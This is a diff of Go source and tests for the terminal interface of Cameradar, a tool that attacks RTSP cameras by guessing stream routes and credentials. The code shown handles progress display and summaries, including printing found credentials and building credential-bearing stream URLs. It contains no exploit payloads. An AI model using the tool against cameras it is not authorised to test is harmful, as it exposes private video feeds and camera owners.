require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
assert.Nil(t, reporter)
|
||||
return
|
||||
}
|
||||
|
||||
require.NoError(t, err)
|
||||
require.NotNil(t, reporter)
|
||||
|
||||
switch test.wantType {
|
||||
case "plain":
|
||||
_, ok := reporter.(*ui.PlainReporter)
|
||||
assert.True(t, ok)
|
||||
case "tui":
|
||||
_, ok := reporter.(*ui.TUIReporter)
|
||||
assert.True(t, ok)
|
||||
}
|
||||
|
||||
reporter.Close()
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestNopReporter_DoesNotPanic(t *testing.T) {
|
||||
reporter := ui.NopReporter{}
|
||||
assert.NotPanics(t, func() {
|
||||
reporter.Start(cameradar.StepScan, "start")
|
||||
reporter.Done(cameradar.StepScan, "done")
|
||||
reporter.Progress(cameradar.StepScan, "progress")
|
||||
reporter.Debug(cameradar.StepScan, "debug")
|
||||
reporter.Error(cameradar.StepScan, assert.AnError)
|
||||
reporter.Summary(nil, nil)
|
||||
reporter.Close()
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,283 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"context"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/charmbracelet/bubbles/progress"
|
||||
"github.com/charmbracelet/bubbles/spinner"
|
||||
"github.com/charmbracelet/bubbles/table"
|
||||
tea "github.com/charmbracelet/bubbletea"
|
||||
)
|
||||
|
||||
type modelState struct {
|
||||
steps []cameradar.Step
|
||||
status map[cameradar.Step]state
|
||||
logs []logMsg
|
||||
summaryStreams []cameradar.Stream
|
||||
summaryFinal bool
|
||||
buildInfo BuildInfo
|
||||
cancel context.CancelFunc
|
||||
debug bool
|
||||
spinner spinner.Model
|
||||
progress progress.Model
|
||||
width int
|
||||
height int
|
||||
quitting bool
|
||||
progressTotals map[cameradar.Step]int
|
||||
progressCounts map[cameradar.Step]int
|
||||
progressTarget float64
|
||||
progressVisible float64
|
||||
}
|
||||
|
||||
func (m *modelState) Init() tea.Cmd {
|
||||
return m.spinner.Tick
|
||||
}
|
||||
|
||||
func (m *modelState) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||
var cmds []tea.Cmd
|
||||
|
||||
switch typed := msg.(type) {
|
||||
case stepMsg:
|
||||
m.handleStepMsg(typed)
|
||||
case logMsg:
|
||||
m.handleLogMsg(typed)
|
||||
case summaryMsg:
|
||||
m.handleSummaryMsg(typed)
|
||||
case progressMsg:
|
||||
m.handleProgressMsg(typed)
|
||||
case closeMsg:
|
||||
m.quitting = true
|
||||
case tea.KeyMsg:
|
||||
if typed.Type == tea.KeyCtrlC {
|
||||
if m.cancel != nil {
|
||||
m.cancel()
|
||||
}
|
||||
m.quitting = true
|
||||
return m, tea.Quit
|
||||
}
|
||||
case spinner.TickMsg:
|
||||
cmds = m.handleSpinnerMsg(typed)
|
||||
case tea.WindowSizeMsg:
|
||||
m.handleWindowSizeMsg(typed)
|
||||
case progress.FrameMsg:
|
||||
}
|
||||
|
||||
if len(cmds) == 0 {
|
||||
return m, nil
|
||||
}
|
||||
return m, tea.Batch(cmds...)
|
||||
}
|
||||
|
||||
func (m *modelState) handleStepMsg(msg stepMsg) {
|
||||
m.status[msg.step] = msg.state
|
||||
if msg.message != "" {
|
||||
level := logInfo
|
||||
if msg.state == stateError {
|
||||
level = logError
|
||||
}
|
||||
m.logs = append(m.logs, logMsg{level: level, step: msg.step, message: msg.message})
|
||||
}
|
||||
if msg.state == stateDone || msg.state == stateError {
|
||||
markStepComplete(m, msg.step)
|
||||
queueProgressUpdate(m)
|
||||
}
|
||||
}
|
||||
|
||||
func (m *modelState) handleLogMsg(msg logMsg) {
|
||||
m.logs = append(m.logs, msg)
|
||||
}
|
||||
|
||||
func (m *modelState) handleSummaryMsg(msg summaryMsg) {
|
||||
m.summaryStreams = msg.streams
|
||||
m.summaryFinal = msg.final
|
||||
if msg.final {
|
||||
m.status[cameradar.StepSummary] = stateDone
|
||||
markStepComplete(m, cameradar.StepSummary)
|
||||
queueProgressUpdate(m)
|
||||
m.quitting = true
|
||||
}
|
||||
}
|
||||
|
||||
func (m *modelState) handleProgressMsg(msg progressMsg) {
|
||||
if msg.total > 0 {
|
||||
m.progressTotals[msg.step] = msg.total
|
||||
if m.progressCounts[msg.step] > msg.total {
|
||||
m.progressCounts[msg.step] = msg.total
|
||||
}
|
||||
}
|
||||
|
||||
if msg.increment > 0 {
|
||||
m.progressCounts[msg.step] += msg.increment
|
||||
total := m.progressTotals[msg.step]
|
||||
if total > 0 && m.progressCounts[msg.step] > total {
|
||||
m.progressCounts[msg.step] = total
|
||||
}
|
||||
}
|
||||
|
||||
queueProgressUpdate(m)
|
||||
}
|
||||
|
||||
func (m *modelState) handleSpinnerMsg(msg spinner.TickMsg) []tea.Cmd {
|
||||
var cmds []tea.Cmd
|
||||
var cmd tea.Cmd
|
||||
m.spinner, cmd = m.spinner.Update(msg)
|
||||
cmds = append(cmds, cmd)
|
||||
advanceProgress(m)
|
||||
if m.quitting && progressComplete(*m) {
|
||||
cmds = append(cmds, tea.Quit)
|
||||
}
|
||||
return cmds
|
||||
}
|
||||
|
||||
func (m *modelState) handleWindowSizeMsg(msg tea.WindowSizeMsg) {
|
||||
m.width = msg.Width
|
||||
m.height = msg.Height
|
||||
m.progress.Width = progressWidth(msg.Width)
|
||||
}
|
||||
|
||||
func (m *modelState) View() string {
|
||||
var builder strings.Builder
|
||||
header := sectionStyle.Render(m.buildInfo.TUIHeader())
|
||||
headerLines := splitLines(header)
|
||||
builder.WriteString(strings.Join(headerLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
stepsLines := m.renderSteps()
|
||||
builder.WriteString(strings.Join(stepsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
summaryHeight, logsHeight := m.layoutHeights(len(headerLines), len(stepsLines))
|
||||
logsLines := m.renderLogs(logsHeight)
|
||||
builder.WriteString(sectionStyle.Render("Logs"))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(strings.Join(logsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
rowsToShow := max(1, summaryHeight-2)
|
||||
summaryTitle := renderSummaryTitle(m.summaryStreams)
|
||||
summaryTables := buildSummaryTables(m.summaryStreams, m.width, m.status, rowsToShow)
|
||||
builder.WriteString(sectionStyle.Render(summaryTitle))
|
||||
builder.WriteString("\n")
|
||||
for i, summary := range summaryTables {
|
||||
builder.WriteString(summaryTableStyle.Render(summary.table.View()))
|
||||
if i < len(summaryTables)-1 {
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
}
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func (m *modelState) FinalView() string {
|
||||
var builder strings.Builder
|
||||
header := sectionStyle.Render(m.buildInfo.TUIHeader())
|
||||
headerLines := splitLines(header)
|
||||
builder.WriteString(strings.Join(headerLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
stepsLines := m.renderSteps()
|
||||
builder.WriteString(strings.Join(stepsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
builder.WriteString(sectionStyle.Render("Logs"))
|
||||
builder.WriteString("\n")
|
||||
logLines := m.renderLogsAll()
|
||||
if len(logLines) == 0 {
|
||||
builder.WriteString(dimStyle.Render("No events yet."))
|
||||
} else {
|
||||
builder.WriteString(strings.Join(logLines, "\n"))
|
||||
}
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
summaryTitle := renderSummaryTitle(m.summaryStreams)
|
||||
visibility := summaryVisibility(summaryStatusAllDone())
|
||||
accessible, others := partitionStreams(m.summaryStreams)
|
||||
rows := append(buildSummaryRows(accessible, visibility), buildSummaryRows(others, visibility)...)
|
||||
if len(rows) == 0 {
|
||||
rows = []table.Row{emptySummaryRow()}
|
||||
}
|
||||
columns := summaryColumns(m.width, rows)
|
||||
builder.WriteString(sectionStyle.Render(summaryTitle))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryTablePlain(columns, rows))
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func (m *modelState) renderSteps() []string {
|
||||
lines := []string{sectionStyle.Render("Steps"), renderProgress(m)}
|
||||
spinnerView := m.spinner.View()
|
||||
for _, step := range m.steps {
|
||||
lines = append(lines, renderStep(step, m.status[step], spinnerView))
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
func (m *modelState) renderLogs(height int) []string {
|
||||
if height <= 0 {
|
||||
return nil
|
||||
}
|
||||
if len(m.logs) == 0 {
|
||||
lines := []string{dimStyle.Render("No events yet.")}
|
||||
return padLines(lines, height)
|
||||
}
|
||||
|
||||
start := 0
|
||||
if len(m.logs) > height {
|
||||
start = len(m.logs) - height
|
||||
}
|
||||
lines := make([]string, 0, min(height, len(m.logs)))
|
||||
for _, entry := range m.logs[start:] {
|
||||
lines = append(lines, renderLog(entry))
|
||||
}
|
||||
return padLines(lines, height)
|
||||
}
|
||||
|
||||
func (m *modelState) renderLogsAll() []string {
|
||||
if len(m.logs) == 0 {
|
||||
return nil
|
||||
}
|
||||
lines := make([]string, 0, len(m.logs))
|
||||
for _, entry := range m.logs {
|
||||
lines = append(lines, renderLog(entry))
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
func (m *modelState) layoutHeights(headerLines, stepsLines int) (summaryHeight, logsHeight int) {
|
||||
if m.height <= 0 {
|
||||
return summaryMinHeight, len(m.logs)
|
||||
}
|
||||
|
||||
reserved := headerLines + 1 + stepsLines + 1 + 1 + 1
|
||||
remaining := m.height - reserved
|
||||
remaining = max(0, remaining)
|
||||
|
||||
switch {
|
||||
case remaining < summaryMinHeight:
|
||||
summaryHeight = max(3, remaining)
|
||||
case remaining > summaryMaxHeight:
|
||||
summaryHeight = summaryMaxHeight
|
||||
default:
|
||||
summaryHeight = remaining
|
||||
}
|
||||
|
||||
logsHeight = max(0, remaining-summaryHeight)
|
||||
|
||||
return summaryHeight, logsHeight
|
||||
}
|
||||
|
||||
func padLines(lines []string, height int) []string {
|
||||
if height <= 0 {
|
||||
return lines
|
||||
}
|
||||
for len(lines) < height {
|
||||
lines = append(lines, "")
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
func splitLines(value string) []string {
|
||||
return strings.Split(value, "\n")
|
||||
}
|
||||
@@ -0,0 +1,14 @@
|
||||
package ui
|
||||
|
||||
import "github.com/charmbracelet/lipgloss"
|
||||
|
||||
var (
|
||||
sectionStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("63"))
|
||||
infoStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("252"))
|
||||
debugStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("244"))
|
||||
successStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("42"))
|
||||
activeStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("39"))
|
||||
errorStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("203"))
|
||||
dimStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("241"))
|
||||
summaryTableStyle = lipgloss.NewStyle().BorderStyle(lipgloss.NormalBorder()).BorderForeground(lipgloss.Color("240"))
|
||||
)
|
||||
@@ -0,0 +1,147 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sort"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// FormatSummary builds a human-readable summary of discovered streams.
|
||||
func FormatSummary(streams []cameradar.Stream, _ error) string {
|
||||
accessible, others := partitionStreams(streams)
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString(fmt.Sprintf("Accessible streams: %d\n", len(accessible)))
|
||||
if len(accessible) == 0 {
|
||||
builder.WriteString("• None\n")
|
||||
} else {
|
||||
for _, stream := range accessible {
|
||||
builder.WriteString(formatStream(stream))
|
||||
}
|
||||
}
|
||||
|
||||
if len(others) > 0 {
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(fmt.Sprintf("Other discovered streams: %d\n", len(others)))
|
||||
for _, stream := range others {
|
||||
builder.WriteString(formatStream(stream))
|
||||
}
|
||||
}
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func partitionStreams(streams []cameradar.Stream) ([]cameradar.Stream, []cameradar.Stream) {
|
||||
var accessible []cameradar.Stream
|
||||
var others []cameradar.Stream
|
||||
for _, stream := range streams {
|
||||
if stream.Available {
|
||||
accessible = append(accessible, stream)
|
||||
} else {
|
||||
others = append(others, stream)
|
||||
}
|
||||
}
|
||||
|
||||
// Sort streams by address and port.
|
||||
sort.Slice(accessible, func(i, j int) bool {
|
||||
if accessible[i].Address.String() == accessible[j].Address.String() {
|
||||
return accessible[i].Port < accessible[j].Port
|
||||
}
|
||||
return accessible[i].Address.String() < accessible[j].Address.String()
|
||||
})
|
||||
sort.Slice(others, func(i, j int) bool {
|
||||
if others[i].Address.String() == others[j].Address.String() {
|
||||
return others[i].Port < others[j].Port
|
||||
}
|
||||
return others[i].Address.String() < others[j].Address.String()
|
||||
})
|
||||
|
||||
return accessible, others
|
||||
}
|
||||
|
||||
func formatStream(stream cameradar.Stream) string {
|
||||
var builder strings.Builder
|
||||
builder.WriteString("• ")
|
||||
builder.WriteString(stream.Address.String())
|
||||
builder.WriteString(":")
|
||||
builder.WriteString(strconv.FormatUint(uint64(stream.Port), 10))
|
||||
|
||||
if stream.Device != "" {
|
||||
builder.WriteString(" (")
|
||||
builder.WriteString(stream.Device)
|
||||
builder.WriteString(")")
|
||||
}
|
||||
builder.WriteString("\n")
|
||||
|
||||
builder.WriteString(" Authentication: ")
|
||||
builder.WriteString(authTypeLabel(stream.AuthenticationType))
|
||||
builder.WriteString("\n")
|
||||
|
||||
if len(stream.Routes) > 0 {
|
||||
builder.WriteString(" Routes: ")
|
||||
builder.WriteString(strings.Join(stream.Routes, ", "))
|
||||
builder.WriteString("\n")
|
||||
} else {
|
||||
builder.WriteString(" Routes: not found\n")
|
||||
}
|
||||
|
||||
if stream.CredentialsFound {
|
||||
builder.WriteString(" Credentials: ")
|
||||
builder.WriteString(stream.Username)
|
||||
builder.WriteString(":")
|
||||
builder.WriteString(stream.Password)
|
||||
builder.WriteString("\n")
|
||||
} else {
|
||||
builder.WriteString(" Credentials: not found\n")
|
||||
}
|
||||
|
||||
builder.WriteString(" Availability: ")
|
||||
if stream.Available {
|
||||
builder.WriteString("yes\n")
|
||||
} else {
|
||||
builder.WriteString("no\n")
|
||||
}
|
||||
|
||||
if stream.RouteFound && stream.CredentialsFound {
|
||||
builder.WriteString(" RTSP URL: ")
|
||||
builder.WriteString(formatRTSPURL(stream))
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
|
||||
builder.WriteString(" Admin panel: ")
|
||||
builder.WriteString(formatAdminPanelURL(stream))
|
||||
builder.WriteString("\n")
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func formatRTSPURL(stream cameradar.Stream) string {
|
||||
path := "/" + strings.TrimLeft(strings.TrimSpace(stream.Route()), "/")
|
||||
|
||||
credentials := ""
|
||||
if stream.Username != "" || stream.Password != "" {
|
||||
credentials = stream.Username + ":" + stream.Password + "@"
|
||||
}
|
||||
|
||||
return fmt.Sprintf("rtsp://%s%s:%d%s", credentials, stream.Address.String(), stream.Port, path)
|
||||
}
|
||||
|
||||
func formatAdminPanelURL(stream cameradar.Stream) string {
|
||||
return fmt.Sprintf("http://%s/", stream.Address.String())
|
||||
}
|
||||
|
||||
func authTypeLabel(auth cameradar.AuthType) string {
|
||||
switch auth {
|
||||
case cameradar.AuthNone:
|
||||
return "none"
|
||||
case cameradar.AuthBasic:
|
||||
return "basic"
|
||||
case cameradar.AuthDigest:
|
||||
return "digest"
|
||||
default:
|
||||
return fmt.Sprintf("unknown(%d)", auth)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,107 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"net/netip"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestFormatSummary(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
streams []cameradar.Stream
|
||||
err error
|
||||
wantContains []string
|
||||
wantNotContains []string
|
||||
orderedPairs [][2]string
|
||||
}{
|
||||
{
|
||||
name: "empty",
|
||||
streams: nil,
|
||||
wantContains: []string{
|
||||
"Accessible streams: 0",
|
||||
"• None",
|
||||
},
|
||||
wantNotContains: []string{
|
||||
"Other discovered streams",
|
||||
"Error:",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed streams with error",
|
||||
streams: []cameradar.Stream{
|
||||
{
|
||||
Device: "Model B",
|
||||
Address: netip.MustParseAddr("10.0.0.2"),
|
||||
Port: 554,
|
||||
Available: true,
|
||||
AuthenticationType: cameradar.AuthNone,
|
||||
},
|
||||
{
|
||||
Device: "Model A",
|
||||
Address: netip.MustParseAddr("10.0.0.1"),
|
||||
Port: 8554,
|
||||
Available: true,
|
||||
Routes: []string{"stream1", "stream2"},
|
||||
RouteFound: true,
|
||||
CredentialsFound: true,
|
||||
Username: "user",
|
||||
Password: "pass",
|
||||
AuthenticationType: cameradar.AuthBasic,
|
||||
},
|
||||
{
|
||||
Address: netip.MustParseAddr("10.0.0.3"),
|
||||
Port: 554,
|
||||
Available: false,
|
||||
AuthenticationType: cameradar.AuthDigest,
|
||||
},
|
||||
},
|
||||
err: errors.New("boom"),
|
||||
wantContains: []string{
|
||||
"Accessible streams: 2",
|
||||
"Other discovered streams: 1",
|
||||
"• 10.0.0.1:8554 (Model A)",
|
||||
"• 10.0.0.2:554 (Model B)",
|
||||
"• 10.0.0.3:554",
|
||||
"Authentication: basic",
|
||||
"Authentication: none",
|
||||
"Authentication: digest",
|
||||
"Routes: stream1, stream2",
|
||||
"Credentials: user:pass",
|
||||
"RTSP URL: rtsp://user:pass@10.0.0.1:8554/stream1",
|
||||
"Admin panel: http://10.0.0.1/",
|
||||
"Admin panel: http://10.0.0.2/",
|
||||
},
|
||||
wantNotContains: []string{
|
||||
"RTSP URL: rtsp://10.0.0.2",
|
||||
"Error:",
|
||||
},
|
||||
orderedPairs: [][2]string{
|
||||
{"• 10.0.0.1:8554", "• 10.0.0.2:554"},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
got := ui.FormatSummary(test.streams, test.err)
|
||||
|
||||
for _, expected := range test.wantContains {
|
||||
assert.Contains(t, got, expected)
|
||||
}
|
||||
for _, unexpected := range test.wantNotContains {
|
||||
assert.NotContains(t, got, unexpected)
|
||||
}
|
||||
for _, pair := range test.orderedPairs {
|
||||
first := strings.Index(got, pair[0])
|
||||
second := strings.Index(got, pair[1])
|
||||
assert.True(t, first >= 0 && second >= 0 && first < second)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,714 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"io"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/charmbracelet/bubbles/progress"
|
||||
"github.com/charmbracelet/bubbles/spinner"
|
||||
"github.com/charmbracelet/bubbles/table"
|
||||
tea "github.com/charmbracelet/bubbletea"
|
||||
"github.com/charmbracelet/lipgloss"
|
||||
)
|
||||
|
||||
type state int
|
||||
|
||||
const (
|
||||
statePending state = iota
|
||||
stateActive
|
||||
stateDone
|
||||
stateError
|
||||
)
|
||||
|
||||
type logLevel int
|
||||
|
||||
const (
|
||||
logInfo logLevel = iota
|
||||
logDebug
|
||||
logError
|
||||
)
|
||||
|
||||
type stepMsg struct {
|
||||
step cameradar.Step
|
||||
state state
|
||||
message string
|
||||
}
|
||||
|
||||
type logMsg struct {
|
||||
level logLevel
|
||||
step cameradar.Step
|
||||
message string
|
||||
}
|
||||
|
||||
type progressMsg struct {
|
||||
step cameradar.Step
|
||||
total int
|
||||
increment int
|
||||
}
|
||||
|
||||
type closeMsg struct{}
|
||||
|
||||
type summaryMsg struct {
|
||||
streams []cameradar.Stream
|
||||
final bool
|
||||
}
|
||||
|
||||
type summaryTable struct {
|
||||
table table.Model
|
||||
}
|
||||
|
||||
const (
|
||||
summaryMinHeight = 8
|
||||
summaryMaxHeight = 10
|
||||
summaryColumnCount = 8
|
||||
)
|
||||
|
||||
// TUIReporter renders a Bubble Tea based UI.
|
||||
type TUIReporter struct {
|
||||
program *tea.Program
|
||||
debug bool
|
||||
once sync.Once
|
||||
closed chan struct{}
|
||||
mu sync.Mutex
|
||||
last []cameradar.Stream
|
||||
}
|
||||
|
||||
// NewTUIReporter creates a new Bubble Tea reporter.
|
||||
func NewTUIReporter(debug bool, out io.Writer, buildInfo BuildInfo, cancel context.CancelFunc) (*TUIReporter, error) {
|
||||
spin := spinner.New()
|
||||
spin.Spinner = spinner.Dot
|
||||
spin.Style = lipgloss.NewStyle().Foreground(lipgloss.Color("63"))
|
||||
|
||||
prog := progress.New(
|
||||
progress.WithDefaultGradient(),
|
||||
progress.WithFillCharacters('━', '·'),
|
||||
progress.WithoutPercentage(),
|
||||
progress.WithWidth(28),
|
||||
)
|
||||
|
||||
initial := &modelState{
|
||||
steps: cameradar.Steps(),
|
||||
status: make(map[cameradar.Step]state),
|
||||
debug: debug,
|
||||
buildInfo: buildInfo,
|
||||
cancel: cancel,
|
||||
spinner: spin,
|
||||
progress: prog,
|
||||
progressTotals: make(map[cameradar.Step]int),
|
||||
progressCounts: make(map[cameradar.Step]int),
|
||||
}
|
||||
|
||||
p := tea.NewProgram(initial, tea.WithInputTTY(), tea.WithOutput(out), tea.WithAltScreen())
|
||||
reporter := &TUIReporter{program: p, debug: debug, closed: make(chan struct{})}
|
||||
|
||||
go func() {
|
||||
model, err := p.Run()
|
||||
if err != nil {
|
||||
_, _ = fmt.Fprintf(out, "Error running TUI: %v\n", err)
|
||||
close(reporter.closed)
|
||||
return
|
||||
}
|
||||
|
||||
if rendered, ok := model.(*modelState); ok {
|
||||
output := rendered.FinalView()
|
||||
if len(rendered.summaryStreams) == 0 {
|
||||
fallback := reporter.snapshotSummary()
|
||||
if len(fallback) > 0 {
|
||||
tmp := &modelState{
|
||||
summaryStreams: fallback,
|
||||
width: rendered.width,
|
||||
status: summaryStatusAllDone(),
|
||||
}
|
||||
output = tmp.FinalView()
|
||||
}
|
||||
}
|
||||
_, _ = fmt.Fprintln(out, output)
|
||||
}
|
||||
close(reporter.closed)
|
||||
}()
|
||||
|
||||
return reporter, nil
|
||||
}
|
||||
|
||||
// Start implements Reporter.
|
||||
func (r *TUIReporter) Start(step cameradar.Step, message string) {
|
||||
r.send(stepMsg{step: step, state: stateActive, message: message})
|
||||
}
|
||||
|
||||
// Done implements Reporter.
|
||||
func (r *TUIReporter) Done(step cameradar.Step, message string) {
|
||||
r.send(stepMsg{step: step, state: stateDone, message: message})
|
||||
}
|
||||
|
||||
// Progress implements Reporter.
|
||||
func (r *TUIReporter) Progress(step cameradar.Step, message string) {
|
||||
if kind, value, ok := cameradar.ParseProgressMessage(message); ok {
|
||||
msg := progressMsg{step: step}
|
||||
if kind == "total" {
|
||||
msg.total = value
|
||||
}
|
||||
if kind == "tick" {
|
||||
msg.increment = value
|
||||
}
|
||||
r.send(msg)
|
||||
return
|
||||
}
|
||||
|
||||
r.send(logMsg{level: logInfo, step: step, message: message})
|
||||
}
|
||||
|
||||
// Debug implements Reporter.
|
||||
func (r *TUIReporter) Debug(step cameradar.Step, message string) {
|
||||
if !r.debug {
|
||||
return
|
||||
}
|
||||
|
||||
r.send(logMsg{level: logDebug, step: step, message: message})
|
||||
}
|
||||
|
||||
// Error implements Reporter.
|
||||
func (r *TUIReporter) Error(step cameradar.Step, err error) {
|
||||
if err == nil {
|
||||
return
|
||||
}
|
||||
|
||||
r.send(stepMsg{step: step, state: stateError, message: err.Error()})
|
||||
}
|
||||
|
||||
// Summary implements Reporter.
|
||||
func (r *TUIReporter) Summary(streams []cameradar.Stream, _ error) {
|
||||
cloned := copyStreams(streams)
|
||||
r.recordSummary(cloned)
|
||||
r.send(summaryMsg{streams: cloned, final: true})
|
||||
}
|
||||
|
||||
// UpdateSummary updates the summary section with partial results.
|
||||
func (r *TUIReporter) UpdateSummary(streams []cameradar.Stream) {
|
||||
cloned := copyStreams(streams)
|
||||
r.recordSummary(cloned)
|
||||
r.send(summaryMsg{streams: cloned, final: false})
|
||||
}
|
||||
|
||||
func (r *TUIReporter) recordSummary(streams []cameradar.Stream) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.last = streams
|
||||
}
|
||||
|
||||
func (r *TUIReporter) snapshotSummary() []cameradar.Stream {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return copyStreams(r.last)
|
||||
}
|
||||
|
||||
// Close implements Reporter.
|
||||
func (r *TUIReporter) Close() {
|
||||
r.once.Do(func() {
|
||||
r.send(closeMsg{})
|
||||
})
|
||||
|
||||
// Timeout after 2 seconds to avoid hanging forever.
|
||||
select {
|
||||
case <-r.closed:
|
||||
case <-time.After(2 * time.Second):
|
||||
}
|
||||
}
|
||||
|
||||
func (r *TUIReporter) send(msg tea.Msg) {
|
||||
if r.program == nil {
|
||||
return
|
||||
}
|
||||
|
||||
r.program.Send(msg)
|
||||
}
|
||||
|
||||
func renderStep(step cameradar.Step, state state, spinnerView string) string {
|
||||
label := cameradar.StepLabel(step)
|
||||
symbol := "·"
|
||||
style := dimStyle
|
||||
switch state {
|
||||
case stateActive:
|
||||
symbol = spinnerView
|
||||
style = activeStyle
|
||||
case stateDone:
|
||||
symbol = "✓"
|
||||
style = successStyle
|
||||
case stateError:
|
||||
symbol = "✗"
|
||||
style = errorStyle
|
||||
}
|
||||
return style.Render(fmt.Sprintf("%s %s", symbol, label))
|
||||
}
|
||||
|
||||
func renderLog(entry logMsg) string {
|
||||
prefix := "INFO"
|
||||
style := infoStyle
|
||||
if entry.level == logDebug {
|
||||
prefix = "DEBUG"
|
||||
style = debugStyle
|
||||
}
|
||||
if entry.level == logError {
|
||||
prefix = "ERROR"
|
||||
style = errorStyle
|
||||
}
|
||||
return style.Render(fmt.Sprintf("[%s] %s: %s", prefix, cameradar.StepLabel(entry.step), entry.message))
|
||||
}
|
||||
|
||||
func renderProgress(m *modelState) string {
|
||||
completed, total := progressCounts(m.steps, m.status)
|
||||
percent := progressPercent(m.steps, m.status, m.progressTotals, m.progressCounts)
|
||||
countLabel := dimStyle.Render(fmt.Sprintf("%3.0f%% %d/%d complete", percent*100, completed, total))
|
||||
return fmt.Sprintf("%s %s", m.progress.ViewAs(m.progressVisible), countLabel)
|
||||
}
|
||||
|
||||
func progressCounts(steps []cameradar.Step, status map[cameradar.Step]state) (int, int) {
|
||||
if len(steps) == 0 {
|
||||
return 0, 0
|
||||
}
|
||||
|
||||
completed := 0
|
||||
for _, step := range steps {
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
completed++
|
||||
}
|
||||
}
|
||||
|
||||
return completed, len(steps)
|
||||
}
|
||||
|
||||
func progressPercent(steps []cameradar.Step, status map[cameradar.Step]state, totals, counts map[cameradar.Step]int) float64 {
|
||||
weights := stepWeights()
|
||||
percent := 0.0
|
||||
for _, step := range steps {
|
||||
weight := weights[step]
|
||||
if weight <= 0 {
|
||||
continue
|
||||
}
|
||||
percent += weight * stepProgress(step, status, totals, counts)
|
||||
}
|
||||
if percent > 1 {
|
||||
return 1
|
||||
}
|
||||
return percent
|
||||
}
|
||||
|
||||
func stepWeights() map[cameradar.Step]float64 {
|
||||
return map[cameradar.Step]float64{
|
||||
cameradar.StepScan: 0.15,
|
||||
cameradar.StepAttackRoutes: 0.25,
|
||||
cameradar.StepDetectAuth: 0.05,
|
||||
cameradar.StepAttackCredentials: 0.35,
|
||||
cameradar.StepValidateStreams: 0.2,
|
||||
cameradar.StepSummary: 0.0,
|
||||
}
|
||||
}
|
||||
|
||||
func stepProgress(step cameradar.Step, status map[cameradar.Step]state, totals, counts map[cameradar.Step]int) float64 {
|
||||
if total := totals[step]; total > 0 {
|
||||
count := counts[step]
|
||||
if count >= total {
|
||||
return 1
|
||||
}
|
||||
return float64(count) / float64(total)
|
||||
}
|
||||
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
return 1
|
||||
default:
|
||||
return 0
|
||||
}
|
||||
}
|
||||
|
||||
func queueProgressUpdate(m *modelState) {
|
||||
desired := progressPercent(m.steps, m.status, m.progressTotals, m.progressCounts)
|
||||
if desired <= m.progressTarget {
|
||||
return
|
||||
}
|
||||
m.progressTarget = desired
|
||||
}
|
||||
|
||||
func advanceProgress(m *modelState) {
|
||||
if m.progressVisible >= m.progressTarget {
|
||||
return
|
||||
}
|
||||
remaining := m.progressTarget - m.progressVisible
|
||||
step := remaining * 0.2
|
||||
if step < 0.02 {
|
||||
step = 0.02
|
||||
}
|
||||
if m.quitting && step < 0.08 {
|
||||
step = 0.08
|
||||
}
|
||||
if remaining < step {
|
||||
m.progressVisible = m.progressTarget
|
||||
return
|
||||
}
|
||||
m.progressVisible += step
|
||||
}
|
||||
|
||||
func progressComplete(m modelState) bool {
|
||||
return m.progressVisible >= m.progressTarget
|
||||
}
|
||||
|
||||
func markStepComplete(m *modelState, step cameradar.Step) {
|
||||
if m.progressTotals[step] == 0 {
|
||||
m.progressTotals[step] = 1
